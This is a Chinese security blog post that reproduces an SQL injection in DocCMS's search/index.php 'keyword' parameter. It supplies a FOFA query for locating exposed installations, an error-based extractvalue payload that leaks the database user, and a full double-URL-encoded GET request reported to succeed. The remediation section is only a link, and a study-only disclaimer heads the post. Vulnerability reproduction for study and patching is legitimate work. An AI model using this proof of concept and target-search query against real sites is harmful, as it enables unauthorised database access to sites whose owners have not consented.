DocCMS keyword SQL注入漏洞复现 [附POC]

gaynell2023-11-17 10:48

文章目录

[DocCMS keyword SQL注入漏洞复现 $附POC$ ](#DocCMS keyword SQL注入漏洞复现 [附POC])
- [0x01 前言](#0x01 前言)
- [0x02 漏洞描述](#0x02 漏洞描述)
- [0x03 影响版本](#0x03 影响版本)
- [0x04 漏洞环境](#0x04 漏洞环境)
- [0x05 漏洞复现](#0x05 漏洞复现)
- [0x06 修复建议](#0x06 修复建议)

DocCMS keyword SQL注入漏洞复现 $附POC$

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

DocCMS是一个开源的内容管理系统(CMS)。DocCMS是一个功能完善、易于扩展和使用的开源CMS系统。特别适用于需要动态内容管理和多用户协作的中小型网站和应用。

0x03 影响版本

复制代码

DocCMS

0x04 漏洞环境

FOFA语法：app="Doccms"

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

payload

bash 复制代码

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

POC （GET）

bash 复制代码

GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

PS：POC中的SQL语句需对payload二次URL编码

3.复现

首先对对payload二次URL编码

发送数据包，出现数据库报错，执行成功！！！

0x06 修复建议

复制代码

官方修复缓解措施
补丁链接：https://gitee.com/husky/DocCMS

上一篇：大数据毕业设计选题推荐-机房信息大数据平台-Hadoop-Spark-Hive

下一篇：数据仓库相关

热门推荐

012026年6月AI大模型全景报告：GPT-5.6、Claude Opus 4.8、Gemini 3.5，中美AI三足鼎立谁主沉浮？022026年6月AI行业全景：从百模大战到Agent元年，这30天发生了什么？03【AI】2026 年具身智能模型和世界模型总结 042026 年 AI 编程工具终极横评：Cursor vs Claude Code vs Copilot vs Windsurf 05Claude Code、Codex、Cursor三分天下：2026年AI编程Agent生态全景剖析 06GitHub 镜像站点 07【AI总结】2026年6月主流国内外大模型总结 08AI科技热点日报 | 2026年6月1日 09AI科技热点日报 | 2026年6月22日 10AI一周事件 · 2026-06-03 至 2026-06-09